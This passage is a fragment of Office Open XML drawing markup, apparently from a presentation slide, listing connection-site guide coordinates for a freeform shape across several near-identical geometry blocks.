              <a:gd name="connsiteY9" fmla="*/ 6492130 h 6858000"/>
              <a:gd name="connsiteX10" fmla="*/ 244546 w 1342244"/>
              <a:gd name="connsiteY10" fmla="*/ 6431610 h 6858000"/>
              <a:gd name="connsiteX11" fmla="*/ 271474 w 1342244"/>
              <a:gd name="connsiteY11" fmla="*/ 6334727 h 6858000"/>
              <a:gd name="connsiteX12" fmla="*/ 263386 w 1342244"/>
              <a:gd name="connsiteY12" fmla="*/ 6294334 h 6858000"/>
              <a:gd name="connsiteX13" fmla="*/ 265826 w 1342244"/>
              <a:gd name="connsiteY13" fmla="*/ 6252834 h 6858000"/>
              <a:gd name="connsiteX14" fmla="*/ 243818 w 1342244"/>
              <a:gd name="connsiteY14" fmla="*/ 6202459 h 6858000"/>
              <a:gd name="connsiteX15" fmla="*/ 242616 w 1342244"/>
              <a:gd name="connsiteY15" fmla="*/ 6153037 h 6858000"/>
              <a:gd name="connsiteX16" fmla="*/ 258031 w 1342244"/>
              <a:gd name="connsiteY16" fmla="*/ 6078132 h 6858000"/>
              <a:gd name="connsiteX17" fmla="*/ 245418 w 1342244"/>
              <a:gd name="connsiteY17" fmla="*/ 6028119 h 6858000"/>
              <a:gd name="connsiteX18" fmla="*/ 230647 w 1342244"/>
              <a:gd name="connsiteY18" fmla="*/ 5926735 h 6858000"/>
              <a:gd name="connsiteX19" fmla="*/ 280159 w 1342244"/>
              <a:gd name="connsiteY19" fmla="*/ 5712857 h 6858000"/>
              <a:gd name="connsiteX20" fmla="*/ 309957 w 1342244"/>
              <a:gd name="connsiteY20" fmla="*/ 5660491 h 6858000"/>
              <a:gd name="connsiteX21" fmla="*/ 319080 w 1342244"/>
              <a:gd name="connsiteY21" fmla="*/ 5563435 h 6858000"/>
              <a:gd name="connsiteX22" fmla="*/ 345956 w 1342244"/>
              <a:gd name="connsiteY22" fmla="*/ 5437125 h 6858000"/>
              <a:gd name="connsiteX23" fmla="*/ 359524 w 1342244"/>
              <a:gd name="connsiteY23" fmla="*/ 5396260 h 6858000"/>
              <a:gd name="connsiteX24" fmla="*/ 375505 w 1342244"/>
              <a:gd name="connsiteY24" fmla="*/ 5330009 h 6858000"/>
              <a:gd name="connsiteX25" fmla="*/ 423664 w 1342244"/>
              <a:gd name="connsiteY25" fmla="*/ 5273739 h 6858000"/>
              <a:gd name="connsiteX26" fmla="*/ 429823 w 1342244"/>
              <a:gd name="connsiteY26" fmla="*/ 5225268 h 6858000"/>
              <a:gd name="connsiteX27" fmla="*/ 438184 w 1342244"/>
              <a:gd name="connsiteY27" fmla="*/ 5193377 h 6858000"/>
              <a:gd name="connsiteX28" fmla="*/ 438105 w 1342244"/>
              <a:gd name="connsiteY28" fmla="*/ 5159961 h 6858000"/>
              <a:gd name="connsiteX29" fmla="*/ 441715 w 1342244"/>
              <a:gd name="connsiteY29" fmla="*/ 5125185 h 6858000"/>
              <a:gd name="connsiteX30" fmla="*/ 455581 w 1342244"/>
              <a:gd name="connsiteY30" fmla="*/ 5067850 h 6858000"/>
              <a:gd name="connsiteX31" fmla="*/ 458312 w 1342244"/>
              <a:gd name="connsiteY31" fmla="*/ 5060861 h 6858000"/>
              <a:gd name="connsiteX32" fmla="*/ 455016 w 1342244"/>
              <a:gd name="connsiteY32" fmla="*/ 5034192 h 6858000"/>
              <a:gd name="connsiteX33" fmla="*/ 456570 w 1342244"/>
              <a:gd name="connsiteY33" fmla="*/ 4993030 h 6858000"/>
              <a:gd name="connsiteX34" fmla="*/ 463479 w 1342244"/>
              <a:gd name="connsiteY34" fmla="*/ 4946844 h 6858000"/>
              <a:gd name="connsiteX35" fmla="*/ 474738 w 1342244"/>
              <a:gd name="connsiteY35" fmla="*/ 4858827 h 6858000"/>
              <a:gd name="connsiteX36" fmla="*/ 480641 w 1342244"/>
              <a:gd name="connsiteY36" fmla="*/ 4821170 h 6858000"/>
              <a:gd name="connsiteX37" fmla="*/ 486667 w 1342244"/>
              <a:gd name="connsiteY37" fmla="*/ 4750867 h 6858000"/>
              <a:gd name="connsiteX38" fmla="*/ 484474 w 1342244"/>
              <a:gd name="connsiteY38" fmla="*/ 4690749 h 6858000"/>
              <a:gd name="connsiteX39" fmla="*/ 479954 w 1342244"/>
              <a:gd name="connsiteY39" fmla="*/ 4584173 h 6858000"/>
              <a:gd name="connsiteX40" fmla="*/ 475037 w 1342244"/>
              <a:gd name="connsiteY40" fmla="*/ 4444346 h 6858000"/>
              <a:gd name="connsiteX41" fmla="*/ 471602 w 1342244"/>
              <a:gd name="connsiteY41" fmla="*/ 4375228 h 6858000"/>
              <a:gd name="connsiteX42" fmla="*/ 452255 w 1342244"/>
              <a:gd name="connsiteY42" fmla="*/ 4214165 h 6858000"/>
              <a:gd name="connsiteX43" fmla="*/ 453884 w 1342244"/>
              <a:gd name="connsiteY43" fmla="*/ 4076008 h 6858000"/>
              <a:gd name="connsiteX44" fmla="*/ 441584 w 1342244"/>
              <a:gd name="connsiteY44" fmla="*/ 4033999 h 6858000"/>
              <a:gd name="connsiteX45" fmla="*/ 441309 w 1342244"/>
              <a:gd name="connsiteY45" fmla="*/ 4013953 h 6858000"/>
              <a:gd name="connsiteX46" fmla="*/ 427604 w 1342244"/>
              <a:gd name="connsiteY46" fmla="*/ 3974753 h 6858000"/>
              <a:gd name="connsiteX47" fmla="*/ 433387 w 1342244"/>
              <a:gd name="connsiteY47" fmla="*/ 3901461 h 6858000"/>
              <a:gd name="connsiteX48" fmla="*/ 455981 w 1342244"/>
              <a:gd name="connsiteY48" fmla="*/ 3813873 h 6858000"/>
              <a:gd name="connsiteX49" fmla="*/ 453239 w 1342244"/>
              <a:gd name="connsiteY49" fmla="*/ 3777135 h 6858000"/>
              <a:gd name="connsiteX50" fmla="*/ 454972 w 1342244"/>
              <a:gd name="connsiteY50" fmla="*/ 3771656 h 6858000"/>
              <a:gd name="connsiteX51" fmla="*/ 458715 w 1342244"/>
              <a:gd name="connsiteY51" fmla="*/ 3769007 h 6858000"/>
              <a:gd name="connsiteX52" fmla="*/ 466877 w 1342244"/>
              <a:gd name="connsiteY52" fmla="*/ 3738082 h 6858000"/>
              <a:gd name="connsiteX53" fmla="*/ 474223 w 1342244"/>
              <a:gd name="connsiteY53" fmla="*/ 3673397 h 6858000"/>
              <a:gd name="connsiteX54" fmla="*/ 473519 w 1342244"/>
              <a:gd name="connsiteY54" fmla="*/ 3637109 h 6858000"/>
              <a:gd name="connsiteX55" fmla="*/ 476962 w 1342244"/>
              <a:gd name="connsiteY55" fmla="*/ 3536883 h 6858000"/>
              <a:gd name="connsiteX56" fmla="*/ 484500 w 1342244"/>
              <a:gd name="connsiteY56" fmla="*/ 3435652 h 6858000"/>
              <a:gd name="connsiteX57" fmla="*/ 498392 w 1342244"/>
              <a:gd name="connsiteY57" fmla="*/ 3295862 h 6858000"/>
              <a:gd name="connsiteX58" fmla="*/ 504159 w 1342244"/>
              <a:gd name="connsiteY58" fmla="*/ 3229163 h 6858000"/>
              <a:gd name="connsiteX59" fmla="*/ 480918 w 1342244"/>
              <a:gd name="connsiteY59" fmla="*/ 3158586 h 6858000"/>
              <a:gd name="connsiteX60" fmla="*/ 456326 w 1342244"/>
              <a:gd name="connsiteY60" fmla="*/ 3112365 h 6858000"/>
              <a:gd name="connsiteX61" fmla="*/ 441801 w 1342244"/>
              <a:gd name="connsiteY61" fmla="*/ 3072935 h 6858000"/>
              <a:gd name="connsiteX62" fmla="*/ 416975 w 1342244"/>
              <a:gd name="connsiteY62" fmla="*/ 2958185 h 6858000"/>
              <a:gd name="connsiteX63" fmla="*/ 374255 w 1342244"/>
              <a:gd name="connsiteY63" fmla="*/ 2843952 h 6858000"/>
              <a:gd name="connsiteX64" fmla="*/ 308507 w 1342244"/>
              <a:gd name="connsiteY64" fmla="*/ 2554718 h 6858000"/>
              <a:gd name="connsiteX65" fmla="*/ 279324 w 1342244"/>
              <a:gd name="connsiteY65" fmla="*/ 2447068 h 6858000"/>
              <a:gd name="connsiteX66" fmla="*/ 283394 w 1342244"/>
              <a:gd name="connsiteY66" fmla="*/ 2423438 h 6858000"/>
              <a:gd name="connsiteX67" fmla="*/ 272284 w 1342244"/>
              <a:gd name="connsiteY67" fmla="*/ 2402874 h 6858000"/>
              <a:gd name="connsiteX68" fmla="*/ 274896 w 1342244"/>
              <a:gd name="connsiteY68" fmla="*/ 2381443 h 6858000"/>
              <a:gd name="connsiteX69" fmla="*/ 251225 w 1342244"/>
              <a:gd name="connsiteY69" fmla="*/ 2261920 h 6858000"/>
              <a:gd name="connsiteX70" fmla="*/ 241112 w 1342244"/>
              <a:gd name="connsiteY70" fmla="*/ 2195378 h 6858000"/>
              <a:gd name="connsiteX71" fmla="*/ 225329 w 1342244"/>
              <a:gd name="connsiteY71" fmla="*/ 2155135 h 6858000"/>
              <a:gd name="connsiteX72" fmla="*/ 222787 w 1342244"/>
              <a:gd name="connsiteY72" fmla="*/ 2118008 h 6858000"/>
              <a:gd name="connsiteX73" fmla="*/ 223780 w 1342244"/>
              <a:gd name="connsiteY73" fmla="*/ 2050531 h 6858000"/>
              <a:gd name="connsiteX74" fmla="*/ 196764 w 1342244"/>
              <a:gd name="connsiteY74" fmla="*/ 1906352 h 6858000"/>
              <a:gd name="connsiteX75" fmla="*/ 173321 w 1342244"/>
              <a:gd name="connsiteY75" fmla="*/ 1861531 h 6858000"/>
              <a:gd name="connsiteX76" fmla="*/ 127120 w 1342244"/>
              <a:gd name="connsiteY76" fmla="*/ 1732919 h 6858000"/>
              <a:gd name="connsiteX77" fmla="*/ 99431 w 1342244"/>
              <a:gd name="connsiteY77" fmla="*/ 1663540 h 6858000"/>
              <a:gd name="connsiteX78" fmla="*/ 98557 w 1342244"/>
              <a:gd name="connsiteY78" fmla="*/ 1615777 h 6858000"/>
              <a:gd name="connsiteX79" fmla="*/ 79352 w 1342244"/>
              <a:gd name="connsiteY79" fmla="*/ 1563678 h 6858000"/>
              <a:gd name="connsiteX80" fmla="*/ 85174 w 1342244"/>
              <a:gd name="connsiteY80" fmla="*/ 1477995 h 6858000"/>
              <a:gd name="connsiteX81" fmla="*/ 71259 w 1342244"/>
              <a:gd name="connsiteY81" fmla="*/ 1373769 h 6858000"/>
              <a:gd name="connsiteX82" fmla="*/ 79566 w 1342244"/>
              <a:gd name="connsiteY82" fmla="*/ 1307086 h 6858000"/>
              <a:gd name="connsiteX83" fmla="*/ 85439 w 1342244"/>
              <a:gd name="connsiteY83" fmla="*/ 1168288 h 6858000"/>
              <a:gd name="connsiteX84" fmla="*/ 77721 w 1342244"/>
              <a:gd name="connsiteY84" fmla="*/ 1142577 h 6858000"/>
              <a:gd name="connsiteX85" fmla="*/ 67027 w 1342244"/>
              <a:gd name="connsiteY85" fmla="*/ 1088484 h 6858000"/>
              <a:gd name="connsiteX86" fmla="*/ 55763 w 1342244"/>
              <a:gd name="connsiteY86" fmla="*/ 1016103 h 6858000"/>
              <a:gd name="connsiteX87" fmla="*/ 57219 w 1342244"/>
              <a:gd name="connsiteY87" fmla="*/ 954054 h 6858000"/>
              <a:gd name="connsiteX88" fmla="*/ 52084 w 1342244"/>
              <a:gd name="connsiteY88" fmla="*/ 896999 h 6858000"/>
              <a:gd name="connsiteX89" fmla="*/ 21492 w 1342244"/>
              <a:gd name="connsiteY89" fmla="*/ 821517 h 6858000"/>
              <a:gd name="connsiteX90" fmla="*/ 442 w 1342244"/>
              <a:gd name="connsiteY90" fmla="*/ 751353 h 6858000"/>
              <a:gd name="connsiteX91" fmla="*/ 0 w 1342244"/>
              <a:gd name="connsiteY91" fmla="*/ 721230 h 6858000"/>
              <a:gd name="connsiteX92" fmla="*/ 9132 w 1342244"/>
              <a:gd name="connsiteY92" fmla="*/ 619315 h 6858000"/>
              <a:gd name="connsiteX93" fmla="*/ 2788 w 1342244"/>
              <a:gd name="connsiteY93" fmla="*/ 585934 h 6858000"/>
              <a:gd name="connsiteX94" fmla="*/ 84 w 1342244"/>
              <a:gd name="connsiteY94" fmla="*/ 538948 h 6858000"/>
              <a:gd name="connsiteX95" fmla="*/ 3992 w 1342244"/>
              <a:gd name="connsiteY95" fmla="*/ 525163 h 6858000"/>
              <a:gd name="connsiteX96" fmla="*/ 30116 w 1342244"/>
              <a:gd name="connsiteY96" fmla="*/ 446567 h 6858000"/>
              <a:gd name="connsiteX97" fmla="*/ 29364 w 1342244"/>
              <a:gd name="connsiteY97" fmla="*/ 393828 h 6858000"/>
              <a:gd name="connsiteX98" fmla="*/ 29194 w 1342244"/>
              <a:gd name="connsiteY98" fmla="*/ 353137 h 6858000"/>
              <a:gd name="connsiteX99" fmla="*/ 34887 w 1342244"/>
              <a:gd name="connsiteY99" fmla="*/ 275771 h 6858000"/>
              <a:gd name="connsiteX100" fmla="*/ 44581 w 1342244"/>
              <a:gd name="connsiteY100" fmla="*/ 236673 h 6858000"/>
              <a:gd name="connsiteX101" fmla="*/ 43624 w 1342244"/>
              <a:gd name="connsiteY101" fmla="*/ 144983 h 6858000"/>
              <a:gd name="connsiteX102" fmla="*/ 33909 w 1342244"/>
              <a:gd name="connsiteY102" fmla="*/ 33857 h 6858000"/>
              <a:gd name="connsiteX103" fmla="*/ 15462 w 1342244"/>
              <a:gd name="connsiteY103" fmla="*/ 0 h 6858000"/>
              <a:gd name="connsiteX0" fmla="*/ 15462 w 1342244"/>
              <a:gd name="connsiteY0" fmla="*/ 0 h 6858000"/>
              <a:gd name="connsiteX1" fmla="*/ 1342244 w 1342244"/>
              <a:gd name="connsiteY1" fmla="*/ 0 h 6858000"/>
              <a:gd name="connsiteX2" fmla="*/ 1342244 w 1342244"/>
              <a:gd name="connsiteY2" fmla="*/ 6858000 h 6858000"/>
              <a:gd name="connsiteX3" fmla="*/ 78938 w 1342244"/>
              <a:gd name="connsiteY3" fmla="*/ 6857735 h 6858000"/>
              <a:gd name="connsiteX4" fmla="*/ 115531 w 1342244"/>
              <a:gd name="connsiteY4" fmla="*/ 6776847 h 6858000"/>
              <a:gd name="connsiteX5" fmla="*/ 127031 w 1342244"/>
              <a:gd name="connsiteY5" fmla="*/ 6737706 h 6858000"/>
              <a:gd name="connsiteX6" fmla="*/ 151770 w 1342244"/>
              <a:gd name="connsiteY6" fmla="*/ 6691589 h 6858000"/>
              <a:gd name="connsiteX7" fmla="*/ 143794 w 1342244"/>
              <a:gd name="connsiteY7" fmla="*/ 6659970 h 6858000"/>
              <a:gd name="connsiteX8" fmla="*/ 161862 w 1342244"/>
              <a:gd name="connsiteY8" fmla="*/ 6594177 h 6858000"/>
              <a:gd name="connsiteX9" fmla="*/ 228859 w 1342244"/>
              <a:gd name="connsiteY9" fmla="*/ 6492130 h 6858000"/>
              <a:gd name="connsiteX10" fmla="*/ 244546 w 1342244"/>
              <a:gd name="connsiteY10" fmla="*/ 6431610 h 6858000"/>
              <a:gd name="connsiteX11" fmla="*/ 271474 w 1342244"/>
              <a:gd name="connsiteY11" fmla="*/ 6334727 h 6858000"/>
              <a:gd name="connsiteX12" fmla="*/ 263386 w 1342244"/>
              <a:gd name="connsiteY12" fmla="*/ 6294334 h 6858000"/>
              <a:gd name="connsiteX13" fmla="*/ 265826 w 1342244"/>
              <a:gd name="connsiteY13" fmla="*/ 6252834 h 6858000"/>
              <a:gd name="connsiteX14" fmla="*/ 243818 w 1342244"/>
              <a:gd name="connsiteY14" fmla="*/ 6202459 h 6858000"/>
              <a:gd name="connsiteX15" fmla="*/ 242616 w 1342244"/>
              <a:gd name="connsiteY15" fmla="*/ 6153037 h 6858000"/>
              <a:gd name="connsiteX16" fmla="*/ 258031 w 1342244"/>
              <a:gd name="connsiteY16" fmla="*/ 6078132 h 6858000"/>
              <a:gd name="connsiteX17" fmla="*/ 245418 w 1342244"/>
              <a:gd name="connsiteY17" fmla="*/ 6028119 h 6858000"/>
              <a:gd name="connsiteX18" fmla="*/ 230647 w 1342244"/>
              <a:gd name="connsiteY18" fmla="*/ 5926735 h 6858000"/>
              <a:gd name="connsiteX19" fmla="*/ 280159 w 1342244"/>
              <a:gd name="connsiteY19" fmla="*/ 5712857 h 6858000"/>
              <a:gd name="connsiteX20" fmla="*/ 309957 w 1342244"/>
              <a:gd name="connsiteY20" fmla="*/ 5660491 h 6858000"/>
              <a:gd name="connsiteX21" fmla="*/ 319080 w 1342244"/>
              <a:gd name="connsiteY21" fmla="*/ 5563435 h 6858000"/>
              <a:gd name="connsiteX22" fmla="*/ 348400 w 1342244"/>
              <a:gd name="connsiteY22" fmla="*/ 5449031 h 6858000"/>
              <a:gd name="connsiteX23" fmla="*/ 359524 w 1342244"/>
              <a:gd name="connsiteY23" fmla="*/ 5396260 h 6858000"/>
              <a:gd name="connsiteX24" fmla="*/ 375505 w 1342244"/>
              <a:gd name="connsiteY24" fmla="*/ 5330009 h 6858000"/>
              <a:gd name="connsiteX25" fmla="*/ 423664 w 1342244"/>
              <a:gd name="connsiteY25" fmla="*/ 5273739 h 6858000"/>
              <a:gd name="connsiteX26" fmla="*/ 429823 w 1342244"/>
              <a:gd name="connsiteY26" fmla="*/ 5225268 h 6858000"/>
              <a:gd name="connsiteX27" fmla="*/ 438184 w 1342244"/>
              <a:gd name="connsiteY27" fmla="*/ 5193377 h 6858000"/>
              <a:gd name="connsiteX28" fmla="*/ 438105 w 1342244"/>
              <a:gd name="connsiteY28" fmla="*/ 5159961 h 6858000"/>
              <a:gd name="connsiteX29" fmla="*/ 441715 w 1342244"/>
              <a:gd name="connsiteY29" fmla="*/ 5125185 h 6858000"/>
              <a:gd name="connsiteX30" fmla="*/ 455581 w 1342244"/>
              <a:gd name="connsiteY30" fmla="*/ 5067850 h 6858000"/>
              <a:gd name="connsiteX31" fmla="*/ 458312 w 1342244"/>
              <a:gd name="connsiteY31" fmla="*/ 5060861 h 6858000"/>
              <a:gd name="connsiteX32" fmla="*/ 455016 w 1342244"/>
              <a:gd name="connsiteY32" fmla="*/ 5034192 h 6858000"/>
              <a:gd name="connsiteX33" fmla="*/ 456570 w 1342244"/>
              <a:gd name="connsiteY33" fmla="*/ 4993030 h 6858000"/>
              <a:gd name="connsiteX34" fmla="*/ 463479 w 1342244"/>
              <a:gd name="connsiteY34" fmla="*/ 4946844 h 6858000"/>
              <a:gd name="connsiteX35" fmla="*/ 474738 w 1342244"/>
              <a:gd name="connsiteY35" fmla="*/ 4858827 h 6858000"/>
              <a:gd name="connsiteX36" fmla="*/ 480641 w 1342244"/>
              <a:gd name="connsiteY36" fmla="*/ 4821170 h 6858000"/>
              <a:gd name="connsiteX37" fmla="*/ 486667 w 1342244"/>
              <a:gd name="connsiteY37" fmla="*/ 4750867 h 6858000"/>
              <a:gd name="connsiteX38" fmla="*/ 484474 w 1342244"/>
              <a:gd name="connsiteY38" fmla="*/ 4690749 h 6858000"/>
              <a:gd name="connsiteX39" fmla="*/ 479954 w 1342244"/>
              <a:gd name="connsiteY39" fmla="*/ 4584173 h 6858000"/>
              <a:gd name="connsiteX40" fmla="*/ 475037 w 1342244"/>
              <a:gd name="connsiteY40" fmla="*/ 4444346 h 6858000"/>
              <a:gd name="connsiteX41" fmla="*/ 471602 w 1342244"/>
              <a:gd name="connsiteY41" fmla="*/ 4375228 h 6858000"/>
              <a:gd name="connsiteX42" fmla="*/ 452255 w 1342244"/>
              <a:gd name="connsiteY42" fmla="*/ 4214165 h 6858000"/>
              <a:gd name="connsiteX43" fmla="*/ 453884 w 1342244"/>
              <a:gd name="connsiteY43" fmla="*/ 4076008 h 6858000"/>
              <a:gd name="connsiteX44" fmla="*/ 441584 w 1342244"/>
              <a:gd name="connsiteY44" fmla="*/ 4033999 h 6858000"/>
              <a:gd name="connsiteX45" fmla="*/ 441309 w 1342244"/>
              <a:gd name="connsiteY45" fmla="*/ 4013953 h 6858000"/>
              <a:gd name="connsiteX46" fmla="*/ 427604 w 1342244"/>
              <a:gd name="connsiteY46" fmla="*/ 3974753 h 6858000"/>
              <a:gd name="connsiteX47" fmla="*/ 433387 w 1342244"/>
              <a:gd name="connsiteY47" fmla="*/ 3901461 h 6858000"/>
              <a:gd name="connsiteX48" fmla="*/ 455981 w 1342244"/>
              <a:gd name="connsiteY48" fmla="*/ 3813873 h 6858000"/>
              <a:gd name="connsiteX49" fmla="*/ 453239 w 1342244"/>
              <a:gd name="connsiteY49" fmla="*/ 3777135 h 6858000"/>
              <a:gd name="connsiteX50" fmla="*/ 454972 w 1342244"/>
              <a:gd name="connsiteY50" fmla="*/ 3771656 h 6858000"/>
              <a:gd name="connsiteX51" fmla="*/ 458715 w 1342244"/>
              <a:gd name="connsiteY51" fmla="*/ 3769007 h 6858000"/>
              <a:gd name="connsiteX52" fmla="*/ 466877 w 1342244"/>
              <a:gd name="connsiteY52" fmla="*/ 3738082 h 6858000"/>
              <a:gd name="connsiteX53" fmla="*/ 474223 w 1342244"/>
              <a:gd name="connsiteY53" fmla="*/ 3673397 h 6858000"/>
              <a:gd name="connsiteX54" fmla="*/ 473519 w 1342244"/>
              <a:gd name="connsiteY54" fmla="*/ 3637109 h 6858000"/>
              <a:gd name="connsiteX55" fmla="*/ 476962 w 1342244"/>
              <a:gd name="connsiteY55" fmla="*/ 3536883 h 6858000"/>
              <a:gd name="connsiteX56" fmla="*/ 484500 w 1342244"/>
              <a:gd name="connsiteY56" fmla="*/ 3435652 h 6858000"/>
              <a:gd name="connsiteX57" fmla="*/ 498392 w 1342244"/>
              <a:gd name="connsiteY57" fmla="*/ 3295862 h 6858000"/>
              <a:gd name="connsiteX58" fmla="*/ 504159 w 1342244"/>
              <a:gd name="connsiteY58" fmla="*/ 3229163 h 6858000"/>
              <a:gd name="connsiteX59" fmla="*/ 480918 w 1342244"/>
              <a:gd name="connsiteY59" fmla="*/ 3158586 h 6858000"/>
              <a:gd name="connsiteX60" fmla="*/ 456326 w 1342244"/>
              <a:gd name="connsiteY60" fmla="*/ 3112365 h 6858000"/>
              <a:gd name="connsiteX61" fmla="*/ 441801 w 1342244"/>
              <a:gd name="connsiteY61" fmla="*/ 3072935 h 6858000"/>
              <a:gd name="connsiteX62" fmla="*/ 416975 w 1342244"/>
              <a:gd name="connsiteY62" fmla="*/ 2958185 h 6858000"/>
              <a:gd name="connsiteX63" fmla="*/ 374255 w 1342244"/>
              <a:gd name="connsiteY63" fmla="*/ 2843952 h 6858000"/>
              <a:gd name="connsiteX64" fmla="*/ 308507 w 1342244"/>
              <a:gd name="connsiteY64" fmla="*/ 2554718 h 6858000"/>
              <a:gd name="connsiteX65" fmla="*/ 279324 w 1342244"/>
              <a:gd name="connsiteY65" fmla="*/ 2447068 h 6858000"/>
              <a:gd name="connsiteX66" fmla="*/ 283394 w 1342244"/>
              <a:gd name="connsiteY66" fmla="*/ 2423438 h 6858000"/>
              <a:gd name="connsiteX67" fmla="*/ 272284 w 1342244"/>
              <a:gd name="connsiteY67" fmla="*/ 2402874 h 6858000"/>
              <a:gd name="connsiteX68" fmla="*/ 274896 w 1342244"/>
              <a:gd name="connsiteY68" fmla="*/ 2381443 h 6858000"/>
              <a:gd name="connsiteX69" fmla="*/ 251225 w 1342244"/>
              <a:gd name="connsiteY69" fmla="*/ 2261920 h 6858000"/>
              <a:gd name="connsiteX70" fmla="*/ 241112 w 1342244"/>
              <a:gd name="connsiteY70" fmla="*/ 2195378 h 6858000"/>
              <a:gd name="connsiteX71" fmla="*/ 225329 w 1342244"/>
              <a:gd name="connsiteY71" fmla="*/ 2155135 h 6858000"/>
              <a:gd name="connsiteX72" fmla="*/ 222787 w 1342244"/>
              <a:gd name="connsiteY72" fmla="*/ 2118008 h 6858000"/>
              <a:gd name="connsiteX73" fmla="*/ 223780 w 1342244"/>
              <a:gd name="connsiteY73" fmla="*/ 2050531 h 6858000"/>
              <a:gd name="connsiteX74" fmla="*/ 196764 w 1342244"/>
              <a:gd name="connsiteY74" fmla="*/ 1906352 h 6858000"/>
              <a:gd name="connsiteX75" fmla="*/ 173321 w 1342244"/>
              <a:gd name="connsiteY75" fmla="*/ 1861531 h 6858000"/>
              <a:gd name="connsiteX76" fmla="*/ 127120 w 1342244"/>
              <a:gd name="connsiteY76" fmla="*/ 1732919 h 6858000"/>
              <a:gd name="connsiteX77" fmla="*/ 99431 w 1342244"/>
              <a:gd name="connsiteY77" fmla="*/ 1663540 h 6858000"/>
              <a:gd name="connsiteX78" fmla="*/ 98557 w 1342244"/>
              <a:gd name="connsiteY78" fmla="*/ 1615777 h 6858000"/>
              <a:gd name="connsiteX79" fmla="*/ 79352 w 1342244"/>
              <a:gd name="connsiteY79" fmla="*/ 1563678 h 6858000"/>
              <a:gd name="connsiteX80" fmla="*/ 85174 w 1342244"/>
              <a:gd name="connsiteY80" fmla="*/ 1477995 h 6858000"/>
              <a:gd name="connsiteX81" fmla="*/ 71259 w 1342244"/>
              <a:gd name="connsiteY81" fmla="*/ 1373769 h 6858000"/>
              <a:gd name="connsiteX82" fmla="*/ 79566 w 1342244"/>
              <a:gd name="connsiteY82" fmla="*/ 1307086 h 6858000"/>
              <a:gd name="connsiteX83" fmla="*/ 85439 w 1342244"/>
              <a:gd name="connsiteY83" fmla="*/ 1168288 h 6858000"/>
              <a:gd name="connsiteX84" fmla="*/ 77721 w 1342244"/>
              <a:gd name="connsiteY84" fmla="*/ 1142577 h 6858000"/>
              <a:gd name="connsiteX85" fmla="*/ 67027 w 1342244"/>
              <a:gd name="connsiteY85" fmla="*/ 1088484 h 6858000"/>
              <a:gd name="connsiteX86" fmla="*/ 55763 w 1342244"/>
              <a:gd name="connsiteY86" fmla="*/ 1016103 h 6858000"/>
              <a:gd name="connsiteX87" fmla="*/ 57219 w 1342244"/>
              <a:gd name="connsiteY87" fmla="*/ 954054 h 6858000"/>
              <a:gd name="connsiteX88" fmla="*/ 52084 w 1342244"/>
              <a:gd name="connsiteY88" fmla="*/ 896999 h 6858000"/>
              <a:gd name="connsiteX89" fmla="*/ 21492 w 1342244"/>
              <a:gd name="connsiteY89" fmla="*/ 821517 h 6858000"/>
              <a:gd name="connsiteX90" fmla="*/ 442 w 1342244"/>
              <a:gd name="connsiteY90" fmla="*/ 751353 h 6858000"/>
              <a:gd name="connsiteX91" fmla="*/ 0 w 1342244"/>
              <a:gd name="connsiteY91" fmla="*/ 721230 h 6858000"/>
              <a:gd name="connsiteX92" fmla="*/ 9132 w 1342244"/>
              <a:gd name="connsiteY92" fmla="*/ 619315 h 6858000"/>
              <a:gd name="connsiteX93" fmla="*/ 2788 w 1342244"/>
              <a:gd name="connsiteY93" fmla="*/ 585934 h 6858000"/>
              <a:gd name="connsiteX94" fmla="*/ 84 w 1342244"/>
              <a:gd name="connsiteY94" fmla="*/ 538948 h 6858000"/>
              <a:gd name="connsiteX95" fmla="*/ 3992 w 1342244"/>
              <a:gd name="connsiteY95" fmla="*/ 525163 h 6858000"/>
              <a:gd name="connsiteX96" fmla="*/ 30116 w 1342244"/>
              <a:gd name="connsiteY96" fmla="*/ 446567 h 6858000"/>
              <a:gd name="connsiteX97" fmla="*/ 29364 w 1342244"/>
              <a:gd name="connsiteY97" fmla="*/ 393828 h 6858000"/>
              <a:gd name="connsiteX98" fmla="*/ 29194 w 1342244"/>
              <a:gd name="connsiteY98" fmla="*/ 353137 h 6858000"/>
              <a:gd name="connsiteX99" fmla="*/ 34887 w 1342244"/>
              <a:gd name="connsiteY99" fmla="*/ 275771 h 6858000"/>
              <a:gd name="connsiteX100" fmla="*/ 44581 w 1342244"/>
              <a:gd name="connsiteY100" fmla="*/ 236673 h 6858000"/>
              <a:gd name="connsiteX101" fmla="*/ 43624 w 1342244"/>
              <a:gd name="connsiteY101" fmla="*/ 144983 h 6858000"/>
              <a:gd name="connsiteX102" fmla="*/ 33909 w 1342244"/>
              <a:gd name="connsiteY102" fmla="*/ 33857 h 6858000"/>
              <a:gd name="connsiteX103" fmla="*/ 15462 w 1342244"/>
              <a:gd name="connsiteY103" fmla="*/ 0 h 6858000"/>
              <a:gd name="connsiteX0" fmla="*/ 15462 w 1342244"/>
              <a:gd name="connsiteY0" fmla="*/ 0 h 6858000"/>
              <a:gd name="connsiteX1" fmla="*/ 1342244 w 1342244"/>
              <a:gd name="connsiteY1" fmla="*/ 0 h 6858000"/>
              <a:gd name="connsiteX2" fmla="*/ 1342244 w 1342244"/>
              <a:gd name="connsiteY2" fmla="*/ 6858000 h 6858000"/>
              <a:gd name="connsiteX3" fmla="*/ 78938 w 1342244"/>
              <a:gd name="connsiteY3" fmla="*/ 6857735 h 6858000"/>
              <a:gd name="connsiteX4" fmla="*/ 115531 w 1342244"/>
              <a:gd name="connsiteY4" fmla="*/ 6776847 h 6858000"/>
              <a:gd name="connsiteX5" fmla="*/ 127031 w 1342244"/>
              <a:gd name="connsiteY5" fmla="*/ 6737706 h 6858000"/>
              <a:gd name="connsiteX6" fmla="*/ 144438 w 1342244"/>
              <a:gd name="connsiteY6" fmla="*/ 6686827 h 6858000"/>
              <a:gd name="connsiteX7" fmla="*/ 143794 w 1342244"/>
              <a:gd name="connsiteY7" fmla="*/ 6659970 h 6858000"/>
              <a:gd name="connsiteX8" fmla="*/ 161862 w 1342244"/>
              <a:gd name="connsiteY8" fmla="*/ 6594177 h 6858000"/>
              <a:gd name="connsiteX9" fmla="*/ 228859 w 1342244"/>
              <a:gd name="connsiteY9" fmla="*/ 6492130 h 6858000"/>
              <a:gd name="connsiteX10" fmla="*/ 244546 w 1342244"/>
              <a:gd name="connsiteY10" fmla="*/ 6431610 h 6858000"/>
              <a:gd name="connsiteX11" fmla="*/ 271474 w 1342244"/>
              <a:gd name="connsiteY11" fmla="*/ 6334727 h 6858000"/>
              <a:gd name="connsiteX12" fmla="*/ 263386 w 1342244"/>
              <a:gd name="connsiteY12" fmla="*/ 6294334 h 6858000"/>
